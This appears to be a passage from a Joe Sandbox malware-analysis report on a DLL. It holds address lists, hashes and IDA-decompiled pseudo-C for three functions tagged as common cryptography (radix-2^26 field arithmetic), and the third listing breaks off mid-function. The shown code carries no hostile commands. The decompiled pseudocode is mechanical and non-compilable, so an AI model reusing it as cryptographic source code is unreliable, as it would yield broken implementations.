0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a38f4432aa03b36fc5473c7e3713b66bb13744ff16b3091737cd4aed2439ea9f
Instruction ID: d58132a5908fe145074bf7e2a6aa7ae7513e44b68b1e78325c133e8e22b121f2
Opcode Fuzzy Hash: a38f4432aa03b36fc5473c7e3713b66bb13744ff16b3091737cd4aed2439ea9f
Instruction Fuzzy Hash: 33D1E572B083C58BE7A48F1DE4407AAB7E6F788754F148236DA9957BD8D63DD440EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E8090 Relevance: .3, Instructions: 295
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E000007FE7FEF30E8090(signed int __rbx, void* __rcx, void* __rdx, void* __r8, signed int __r9, signed int __r10, signed int __r12, signed int __r13) {
				signed int _t115;
				unsigned int _t131;
				signed int _t132;
				signed int _t137;
				unsigned int _t142;
				signed int _t150;
				unsigned int _t154;
				intOrPtr _t160;
				signed long long _t176;
				signed long long _t178;
				signed long long _t180;
				signed long long _t181;
				signed long long _t182;
				signed long long _t183;
				signed long long _t184;
				signed long long _t185;
				signed long long _t192;
				signed long long _t193;
				signed long long _t194;
				signed long long _t195;
				signed long long _t196;
				signed long long _t197;
				signed long long _t198;
				signed long long _t202;
				void* _t209;
				void* _t210;
				signed long long _t213;
				signed long long _t215;
				signed long long _t233;
				signed long long _t241;
				signed long long _t251;
				signed long long _t253;
				signed long long _t255;
				long long _t257;
				void* _t258;
				void* _t260;
				signed long long _t261;
				signed long long _t265;
				void* _t273;
				intOrPtr* _t284;
				signed int* _t285;
				signed long long* _t287;
				void* _t289;

				_t273 = _t260;
				_t261 = _t260 - 0x98;
				_t178 =  *0xf319c428; // 0x2fa980d671f5
				 *(_t261 + 0x70) = _t178 ^ _t261;
				 *((long long*)(_t273 + 0x20)) = __rbx;
				_t255 = __rcx + 0x0000003f & 0xffffffc0;
				_t180 =  *((intOrPtr*)(_t255 + 0x48));
				_t284 = _t255 + 0x48;
				 *((long long*)(_t261 + 0x50)) = _t284;
				if (_t180 == 0) goto 0xf30e8464;
				 *((long long*)(_t273 - 0x28)) = _t257;
				r8d = 0x10;
				_t265 =  >  ? __r8 : __r8 - _t180;
				if (_t265 == 0) goto 0xf30e8117;
				_t241 = __rdx + 1;
				 *((char*)( *_t284 + __rdx + _t255 + 0x38)) =  *(__rdx + __rdx) & 0x000000ff;
				if (_t241 - _t265 < 0) goto 0xf30e8100;
				 *_t284 =  *_t284 + _t265;
				_t251 = __r8 - _t265;
				_t289 = __rdx + _t265;
				 *(_t261 + 0x58) = _t251;
				if ( *_t284 != _t257) goto 0xf30e845c;
				_t285 = _t255 + 0x38;
				 *(_t261 + 0x30) = _t180;
				 *(_t261 + 0x28) = _t180;
				 *((long long*)(_t261 + 0x88)) = __r12;
				r12d =  *(_t255 + 0x20);
				 *(_t261 + 0x38) = _t180;
				 *(_t261 + 0x48) = _t180;
				 *((long long*)(_t261 + 0x80)) = __r13;
				 *(_t261 + 0x40) = __r12;
				r13d =  *_t255;
				_t258 = _t257 - 0x10;
				_t131 = _t285[1];
				r9d =  *_t285;
				_t142 = _t285[2];
				r11d = _t285[3];
				r10d = _t142;
				r9d = r9d >> 0x1a;
				r9d = r9d | _t131 << 0x00000006;
				r10d = r10d << 0xc;
				_t132 = _t131 >> 0x14;
				r10d = r10d | _t132;
				r11d = r11d >> 8;
				r9d = r9d & 0x03ffffff;
				r9d = r9d +  *(_t255 + 0x28);
				r10d = r10d & 0x03ffffff;
				r10d = r10d +  *(_t255 + 0x2c);
				asm("inc ecx");
				r11d = r11d +  *(_t255 + 0x34);
				r8d = r9d;
				r9d = r10d;
				r10d = ((r11d << 0x00000012 | _t142 >> 0x0000000e) & 0x03ffffff) +  *(_t255 + 0x30);
				_t181 = _t180 * _t241;
				_t182 = _t181 * _t241;
				_t183 = _t182 * _t241;
				_t184 = _t183 * __r12;
				_t185 = _t184 *  *(_t261 + 0x28);
				_t186 = _t185 * __r13;
				_t192 = _t251 *  *(_t261 + 0x38);
				r12d = _t132;
				r12d = r12d & 0x03ffffff;
				 *(_t255 + 0x28) = r12d;
				_t193 = _t192 * _t241;
				_t194 = _t193 * __r13;
				_t195 = _t194 * _t241;
				_t196 = _t195 * _t241;
				r13d = _t132;
				_t233 = (_t251 * _t241 + _t185 + _t185 * __r13 + _t186 *  *(_t261 + 0x30) + _t186 *  *(_t261 + 0x30) * __r12 + (_t251 * __r13 + _t181 + _t182 + _t183 + _t184 >> 0x1a) >> 0x1a) + _t192 + _t193 + _t194 + _t195 + _t196 >> 0x1a;
				_t150 = _t132;
				r13d = r13d & 0x03ffffff;
				_t197 = _t196 * _t233;
				 *(_t255 + 0x2c) = r13d;
				_t198 = _t197 * _t233;
				_t199 = _t198 * _t233;
				_t213 = __rbx * _t233;
				_t202 = _t251 *  *(_t261 + 0x48);
				r11d = r11d & 0x03ffffff;
				_t247 = _t241 + _t197 + _t198 + _t198 * _t233 + _t199 *  *(_t261 + 0x40) + _t202 >> 0x1a;
				_t115 = _t150 & 0x03ffffff;
				 *(_t261 + 0x20) = _t115;
				 *(_t255 + 0x30) = _t115;
				 *(_t255 + 0x34) = _t150 & 0x03ffffff;
				_t160 = (_t202 + _t265 * (_t241 + _t197 + _t198 + _t198 * _t233 + _t199 *  *(_t261 + 0x40) + _t202 >> 0x1a) + __r9 * (_t241 + _t197 + _t198 + _t198 * _t233 + _t199 *  *(_t261 + 0x40) + _t202 >> 0x1a) + __r10 * _t247 + _t213 + _t251 * _t233 >> 0x1a) + (_t202 + _t265 * (_t241 + _t197 + _t198 + _t198 * _t233 + _t199 *  *(_t261 + 0x40) + _t202 >> 0x1a) + __r9 * (_t241 + _t197 + _t198 + _t198 * _t233 + _t199 *  *(_t261 + 0x40) + _t202 >> 0x1a) + __r10 * _t247 + _t213 + _t251 * _t233 >> 0x1a) * 4 + r11d;
				 *((intOrPtr*)(_t255 + 0x24)) = _t160;
				if (_t258 - 0x10 >= 0) goto 0xf30e8432;
				if (_t258 == 0) goto 0xf30e843b;
				if (_t258 == 0) goto 0xf30e838f;
				E000007FE7FEF30F1E10();
				_t209 = _t258;
				 *((char*)(_t261 + _t209 + 0x60)) = 1;
				_t210 = _t209 + 1;
				if (_t210 - 0x10 >= 0) goto 0xf30e83ae;
				 *((char*)(_t261 + _t210 + 0x60)) = 0;
				if (_t210 + 1 - 0x10 < 0) goto 0xf30e83a0;
				_t154 =  *(_t261 + 0x64);
				_t137 =  *(_t261 + 0x60);
				r9d = _t154;
				r8d =  *(_t261 + 0x68);
				r9d = r9d << 6;
				r9d = r9d | _t137 >> 0x0000001a;
				r10d = r8d;
				r10d = r10d << 0xc;
				r10d = r10d | _t154 >> 0x00000014;
				r8d = r8d >> 0xe;
				r9d = r9d & 0x03ffffff;
				 *((intOrPtr*)(_t255 + 0x24)) = _t160 + (_t137 & 0x03ffffff);
				r9d = r9d + r12d;
				r10d = r10d & 0x03ffffff;
				r12d =  *(_t255 + 0x20);
				r10d = r10d + r13d;
				r13d =  *_t255;
				 *(_t255 + 0x28) = r9d;
				 *(_t255 + 0x2c) = r10d;
				 *(_t255 + 0x30) = (( *(_t261 + 0x6c) << 0x00000012 | r8d) & 0x03ffffff) +  *(_t261 + 0x20);
				r11d = _t261 + 0x60 + _t213;
				 *(_t255 + 0x34) = r11d;
				goto 0xf30e81e0;
				r12d =  *(_t255 + 0x20);
				goto 0xf30e816b;
				_t287 =  *((intOrPtr*)(_t261 + 0x50));
				_t253 =  *(_t261 + 0x58);
				 *_t287 = 0;
				if (_t253 - 0x10 < 0) goto 0xf30e8485;
				_t215 = _t253 & 0xfffffff0;
				E000007FE7FEF30E84E0(_t215, _t255, _t289, _t215, _t251 * __r13 + _t181 + _t182 + _t183 + _t184);
				_t290 = _t289 + _t215;
				_t176 = _t253;
				if (_t176 == 0) goto 0xf30e84b6;
				 *((char*)(_t255 - _t289 + _t215 +  &(_t290[0x38]))) =  *(_t289 + _t215) & 0x000000ff;
				if (_t176 != 0) goto 0xf30e84a0;
				 *_t287 = _t253;
				return E000007FE7FEF30F1360( *(_t289 + _t215) & 0x000000ff,  *(_t261 + 0x6c) >> 8,  *(_t261 + 0x70) ^ _t261);
			}

0x7fef30e8090
0x7fef30e8099
0x7fef30e80a0
0x7fef30e80aa
0x7fef30e80b3
0x7fef30e80b7
0x7fef30e80be
0x7fef30e80c2
0x7fef30e80c6
0x7fef30e80d1
0x7fef30e80d7
0x7fef30e80e0
0x7fef30e80e9
0x7fef30e80f2
0x7fef30e810b
0x7fef30e810e
0x7fef30e8115
0x7fef30e8117
0x7fef30e811a
0x7fef30e811d
0x7fef30e8120
0x7fef30e8128
0x7fef30e8131
0x7fef30e8135
0x7fef30e813d
0x7fef30e8145
0x7fef30e814d
0x7fef30e8151
0x7fef30e8159
0x7fef30e815e
0x7fef30e8166
0x7fef30e816b
0x7fef30e8171
0x7fef30e8175
0x7fef30e8179
0x7fef30e817c
0x7fef30e8182
0x7fef30e8186
0x7fef30e8190
0x7fef30e819a
0x7fef30e819d
0x7fef30e81a4
0x7fef30e81aa
0x7fef30e81ad
0x7fef30e81b1
0x7fef30e81b8
0x7fef30e81bc
0x7fef30e81c3
0x7fef30e81c7
0x7fef30e81cc
0x7fef30e81f0
0x7fef30e81f3
0x7fef30e81f6
0x7fef30e81fb
0x7fef30e8208
0x7fef30e8215
0x7fef30e8222
0x7fef30e822f
0x7fef30e823b
0x7fef30e8265
0x7fef30e826b
0x7fef30e8274
0x7fef30e827e
0x7fef30e8285
0x7fef30e8292
0x7fef30e829b
0x7fef30e82a8
0x7fef30e82b2
0x7fef30e82b5
0x7fef30e82b9
0x7fef30e82bb
0x7fef30e82c5
0x7fef30e82cf
0x7fef30e82d6
0x7fef30e82e2
0x7fef30e82f4
0x7fef30e82fe
0x7fef30e830b
0x7fef30e8314
0x7fef30e8318
0x7fef30e831d
0x7fef30e8321
0x7fef30e8356
0x7fef30e835c
0x7fef30e835f
0x7fef30e8366
0x7fef30e836f
0x7fef30e837a
0x7fef30e8387
0x7fef30e838c
0x7fef30e838f
0x7fef30e8394
0x7fef30e839b
0x7fef30e83a0
0x7fef30e83ac
0x7fef30e83ae
0x7fef30e83b4
0x7fef30e83b8
0x7fef30e83bb
0x7fef30e83c7
0x7fef30e83d0
0x7fef30e83da
0x7fef30e83dd
0x7fef30e83e6
0x7fef30e83e9
0x7fef30e83ed
0x7fef30e83f7
0x7fef30e83fa
0x7fef30e8406
0x7fef30e840d
0x7fef30e8411
0x7fef30e8414
0x7fef30e841a
0x7fef30e841e
0x7fef30e8422
0x7fef30e8425
0x7fef30e8429
0x7fef30e842d
0x7fef30e8432
0x7fef30e8436
0x7fef30e843b
0x7fef30e8440
0x7fef30e8455
0x7fef30e8468
0x7fef30e8470
0x7fef30e847a
0x7fef30e847f
0x7fef30e848d
0x7fef30e8490
0x7fef30e84a4
0x7fef30e84b1
0x7fef30e84b3
0x7fef30e84d0

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9c900ba37a38d6537f2455c7006ce1d24e58ce5634c53796ba473e3470dfd5
Instruction ID: bd2ed561ede0978bef9cc5ae3cca32042c83c61ed3a7747650a44e7f70208397
Opcode Fuzzy Hash: 7f9c900ba37a38d6537f2455c7006ce1d24e58ce5634c53796ba473e3470dfd5
Instruction Fuzzy Hash: 95B1B3737156808BC768CF19B44172AB7A6F789794F149226DF9E83BE5DA3CE9018B00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30EC270 Relevance: .3, Instructions: 287
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30EC270(signed int __rax, signed int __rcx, signed int __rdx, signed int __r8, signed int __r10, signed int __r11, void* _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v88;
				unsigned long long _v96;
				unsigned long long _v104;
				signed long long _v112;
				long long _v120;
				long long _v128;
				signed long long _v136;
				long long _v144;
				void* _v152;
				signed long long _v160;
				signed int _t92;
				signed int _t97;
				signed int _t107;
				signed int _t115;
				signed int _t117;
				signed int _t118;
				unsigned int _t127;
				signed long long _t142;
				signed long long _t143;
				signed long long _t144;
				signed long long _t153;
				signed long long _t213;
				signed long long _t216;
				unsigned long long _t223;
				signed long long _t243;
				signed long long _t248;
				signed long long _t254;
				signed long long _t258;
				void* _t265;
				intOrPtr* _t266;
				signed long long _t269;
				signed long long _t282;
				signed long long _t283;
				signed int* _t295;
				unsigned long long _t302;
				void* _t311;
				signed long long _t313;
				void* _t317;
				signed long long _t318;

				_a8 = __rcx;
				_t266 = _t265 - 0x68;
				r15d =  *__rdx;
				r11d =  *(__rdx + 0x10);
				r8d =  *(__rdx + 4);
				r14d = _t248 + _t248;
				r13d =  *(__rdx + 0x1c);
				r12d =  *(__rdx + 0x18);
				_v128 = __rax;
				_v144 = __rcx;
				_v152 = __r11;
				_a32 = __r8;
				_v120 = __rax;
				_v160 = _t318;
				_t254 = __rax + __rax;
				_a16 = _t313 * 2;
				r10d = r12d * 0x13;
				_t282 = __rax + __rax;
				_a24 = __rax;
				 *_t266 = __rax;
				_v136 = _t258;
				_t216 =  *_t266;
				_t142 = _t216 * _t254;
				_t143 = _t142 * _t282;
				_t144 = _t143 * _t318;
				_t243 = __rcx * _t248 + (__rdx * __r8 + __rax * _a24) * 2 + _t142 + _t143 + _t144;
				_t92 = __r8 + __r8;
				r11d = _t92;
				r8d = _t92;
				_t283 = _v152;
				_v112 = _t243;
				_t153 = _t243 >> 0x1a;
				_t302 = __r11 * _t318 + _t144 * _t282 + _a24 * _t254 + _t216 * _t258 + _t283 * _t213 + _t153;
				_v104 = _t302;
				_t269 = __r8 * _a32;
				_t223 = _t153 * _a24 * _t318 + (_t216 * _t213 + _t153 * _a24) * 2 + _t283 * _t254 + _t269 + _t283 * _t254 * __r10 + (_t302 >> 0x19);
				_t97 = r12d + r12d;
				_v96 = _t223;
				r8d = _t97;
				r11d = _t97;
				r9d = r9d + r9d;
				_v88 = _t269 * _t318 + _t243 * _a32 + _a24 * _t254 + _a24 * _t254 * _t213 + _t283 * _t258 + (_t223 >> 0x1a);
				r8d = _t317 + _t317;
				_t107 = _t311 + _t311;
				r10d = _t107;
				r14d = _a16;
				r9d = _t317 + _t317;
				r8d = _v144 + _v144;
				_t295 = _a8;
				_t127 = _t107 + _t107 + (_t107 + _t107 & 0x01ffffff);
				 *_t295 = _t216 + _t216 & 0x3ffffff;
				_t115 = _t127 & 0x01ffffff;
				_t295[1] = _t115;
				r15d = r15d & 0x03ffffff;
				_t295[4] = r15d;
				_t117 = (_t115 & 0x03ffffff) + (_t127 >> 0x19);
				_t295[5] = r13d & 0x01ffffff;
				_t295[2] = _t117;
				r11d = r11d & 0x01ffffff;
				_t118 = _t117 & 0x01ffffff;
				_t295[6] =  *(__rdx + 0x14) & 0x03ffffff;
				r9d = r9d & 0x03ffffff;
				_t295[3] = _t118;
				r8d = r8d & 0x01ffffff;
				_t295[7] = r11d;
				_t295[9] = r8d;
				_t295[8] = r9d;
				return _t118;
			}

0x7fef30ec270
0x7fef30ec281
0x7fef30ec28b
0x7fef30ec291
0x7fef30ec295
0x7fef30ec299
0x7fef30ec29d
0x7fef30ec2a1
0x7fef30ec2a5
0x7fef30ec2ad
0x7fef30ec2b2
0x7fef30ec2bb
0x7fef30ec2c3
0x7fef30ec2c8
0x7fef30ec2cd
0x7fef30ec2d9
0x7fef30ec2e4
0x7fef30ec2e7
0x7fef30ec2ee
0x7fef30ec2f9
0x7fef30ec31d
0x7fef30ec326
0x7fef30ec32d
0x7fef30ec337
0x7fef30ec341
0x7fef30ec345
0x7fef30ec348
0x7fef30ec34c
0x7fef30ec34f
0x7fef30ec35c
0x7fef30ec361
0x7fef30ec38f
0x7fef30ec396
0x7fef30ec3a1
0x7fef30ec3c9
0x7fef30ec3ef
0x7fef30ec3fa
0x7fef30ec3fc
0x7fef30ec401
0x7fef30ec404
0x7fef30ec430
0x7fef30ec456
0x7fef30ec496
0x7fef30ec4d5
0x7fef30ec4e0
0x7fef30ec503
0x7fef30ec57a
0x7fef30ec5fa
0x7fef30ec615
0x7fef30ec63f
0x7fef30ec649
0x7fef30ec64c
0x7fef30ec654
0x7fef30ec658
0x7fef30ec66f
0x7fef30ec673
0x7fef30ec675
0x7fef30ec679
0x7fef30ec688
0x7fef30ec68f
0x7fef30ec694
0x7fef30ec698
0x7fef30ec69f
0x7fef30ec6a3
0x7fef30ec6aa
0x7fef30ec6ae
0x7fef30ec6b2
0x7fef30ec6c6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff1e1d1bece3e67249bc81ff0eb3fd132d0fa0ccd0d6286f362949bc7a5456b
Instruction ID: 1488e58c7ee335df793d30832317a20281a15d71469282793a0c2493dcdac7ec
Opcode Fuzzy Hash: 8ff1e1d1bece3e67249bc81ff0eb3fd132d0fa0ccd0d6286f362949bc7a5456b
Instruction Fuzzy Hash: 37A19673B417984BCA58CF0DB841799F799F3D8784F045226AA8D87BA4EE3CE611CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30EC8C0 Relevance: .3, Instructions: 284
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E000007FE7FEF30EC8C0(void* __rax, signed int __rcx, unsigned int* __rdx, void* __r9, signed int __r10, signed int __r11, void* _a8, unsigned int _a16, unsigned int _a24, signed int _a32) {
				unsigned int _v88;
				unsigned int _v92;
				unsigned int _v96;
				unsigned int _v100;
				unsigned int _v104;
				unsigned int _v108;
				unsigned int _v112;
				unsigned int _v116;
				unsigned int _v120;
				unsigned int _v124;
				unsigned int _v128;
				unsigned int _v132;
				unsigned int _v136;
				unsigned int _v140;
				unsigned int _v144;
				unsigned int _v148;
				unsigned int _t135;
				unsigned int _t158;
				unsigned int _t161;
				unsigned int _t162;
				unsigned int _t165;
				unsigned int _t166;
				unsigned int _t167;
				unsigned int _t170;
				unsigned int _t171;
				unsigned int _t182;
				signed int _t185;
				unsigned int _t190;
				signed int _t193;
				signed int _t194;
				unsigned int _t197;
				unsigned int _t203;
				unsigned int _t205;
				signed int _t208;
				unsigned int _t210;
				signed int _t213;
				unsigned int _t215;
				unsigned int _t219;
				signed int _t223;
				void* _t234;
				signed int* _t235;
				intOrPtr* _t240;
				intOrPtr _t241;
				intOrPtr _t242;

				_a8 = __rcx;
				_t235 = _t234 - 0x58;
				r8d =  *__rdx;
				r10d = __rdx[1];
				r8d = r8d - 0x3ffffed;
				r11d = __rdx[2];
				r15d = __rdx[3];
				r10d = r10d - ( ~(r8d >> 0x1a) & 0x000000ff);
				r14d = __rdx[4];
				r9d = __rdx[5];
				r10d = r10d - 0x1ffffff;
				r11d = r11d - ( ~(r10d >> 0x19) & 0x000000ff);
				r11d = r11d - 0x3ffffff;
				r15d = r15d - ( ~(r11d >> 0x1a) & 0x000000ff);
				r15d = r15d - 0x1ffffff;
				r14d = r14d - ( ~(r15d >> 0x19) & 0x000000ff);
				r14d = r14d - 0x3ffffff;
				r9d = r9d - ( ~(r14d >> 0x1a) & 0x000000ff);
				r9d = r9d - 0x1ffffff;
				_t185 = __rdx[6] - ( ~(r9d >> 0x19) & 0x000000ff) - 0x3ffffff;
				_t213 = __rdx[7] - ( ~(_t185 >> 0x1a) & 0x000000ff) - 0x1ffffff;
				_t223 = __rdx[8] - ( ~(_t213 >> 0x19) & 0x000000ff) - 0x3ffffff;
				_t193 = __rdx[9] - ( ~(_t223 >> 0x1a) & 0x000000ff) - 0x1ffffff;
				_a32 = _t193;
				asm("sbb ecx, ecx");
				r8d = r8d & 0x03ffffff;
				 *_t235 = _t193;
				_t135 = (_t193 & 0x03ffffed) + r8d;
				_t208 = _t193 & 0x01ffffff;
				_t219 = _t135 & 0x03ffffff;
				_v148 = _t219;
				r15d = r15d & 0x01ffffff;
				_t194 = _t193 & 0x03ffffff;
				r14d = r14d & 0x03ffffff;
				r10d = r10d & 0x01ffffff;
				r11d = r11d & 0x03ffffff;
				r10d = r10d + (_t135 >> 0x1a) + _t208;
				r9d = r9d & 0x01ffffff;
				r11d = r11d + (r10d >> 0x19) + _t194;
				r10d = r10d & 0x01ffffff;
				r11d = r11d & 0x03ffffff;
				r15d = r15d + (r11d >> 0x1a) + _t208;
				r15d = r15d & 0x01ffffff;
				r15d = r15d << 5;
				r14d = r14d + (r15d >> 0x19) + _t194;
				r14d = r14d << 6;
				r9d = r9d + (r14d >> 0x1a) + _t208;
				r8d = r9d;
				r9d = r9d >> 0x19;
				r8d = r8d & 0x01ffffff;
				_v88 = r8d;
				_t215 = (_t213 & 0x01ffffff) + ((_t185 & 0x03ffffff) + __rcx + __r9 >> 0x1a) + _t208;
				_a24 = _t215;
				_t158 = _t219 >> 8;
				_v144 = _t158;
				_v140 = _t158 >> 8;
				_a16 = (_t223 & 0x03ffffff) + (_t215 >> 0x19) + _t194;
				_t161 = __rax + __r10 * 4;
				_v136 = _t161;
				_t162 = _t161 >> 8;
				_v132 = _t162;
				_v128 = _t162 >> 8;
				_t165 = __rax + __r11 * 8;
				_v124 = _t165;
				_t166 = _t165 >> 8;
				_v120 = _t166;
				_t167 = _t166 >> 8;
				_v116 = _t167;
				r15d = r15d + (_t167 >> 8);
				_v112 = r15d;
				_t170 = r15d >> 8;
				_v108 = _t170;
				_t171 = _t170 >> 8;
				_v104 = _t171;
				r14d = r14d + (_t171 >> 8);
				r15d = r14d;
				_v100 = r14d;
				r15d = r15d >> 8;
				_v96 = r15d;
				r13d = r15d;
				r15d = _v148;
				r13d = r13d >> 8;
				r12d = r8d;
				_v92 = r13d;
				_t240 = _a8;
				r12d = r12d >> 8;
				r14d = r12d;
				r14d = r14d >> 8;
				 *_t240 = r15b;
				r15d = _v144;
				 *((intOrPtr*)(_t240 + 1)) = r15b;
				r15d = _v140;
				 *((intOrPtr*)(_t240 + 2)) = r15b;
				r15d = _v136;
				 *((intOrPtr*)(_t240 + 3)) = r15b;
				r15d = _v132;
				 *((intOrPtr*)(_t240 + 4)) = r15b;
				r15d = _v128;
				 *((intOrPtr*)(_t240 + 5)) = r15b;
				r15d = _v124;
				 *((intOrPtr*)(_t240 + 6)) = r15b;
				r15d = _v120;
				 *((intOrPtr*)(_t240 + 7)) = r15b;
				r15d = _v116;
				 *((intOrPtr*)(_t240 + 8)) = r15b;
				r15d = _v112;
				 *((intOrPtr*)(_t240 + 9)) = r15b;
				r15d = _v108;
				 *((intOrPtr*)(_t240 + 0xa)) = r15b;
				r15d = _v104;
				 *((intOrPtr*)(_t240 + 0xb)) = r15b;
				r15d = _v100;
				 *((intOrPtr*)(_t240 + 0xc)) = r15b;
				r15d = _v96;
				 *((intOrPtr*)(_t240 + 0xd)) = r15b;
				r13d = _v92;
				_t242 = _a8;
				 *((intOrPtr*)(_t242 + 0xe)) = r13b;
				r11d = __rax + __rcx * 8;
				_t197 = _a16;
				r9d = _t197;
				r9d = r9d & 0x03ffffff;
				_t190 = r11d >> 8;
				r9d = r9d << 4;
				r10d = _t190;
				r10d = r10d >> 8;
				r9d = r9d + (r10d >> 8);
				r8d = r9d;
				r8d = r8d >> 8;
				_t210 = r8d >> 8;
				_t203 = ((_t197 >> 0x0000001a) + _a32 +  *_t235 << 0x00000006 & 0x7fffffc0) + (_t210 >> 8);
				_a16 = _t203;
				_t182 = _t203 >> 8;
				_t205 = _t182 >> 8;
				r13d = r13d >> 8;
				 *((intOrPtr*)(_t242 + 0xf)) = r13b;
				_t241 = _a8;
				r15d = _v88;
				 *(_t241 + 0x1e) = _t205;
				 *((intOrPtr*)(_t241 + 0x14)) = bpl;
				 *((char*)(_t241 + 0x1f)) = _t205 >> 8;
				 *((intOrPtr*)(_t241 + 0x10)) = r15b;
				 *((intOrPtr*)(_t241 + 0x11)) = r12b;
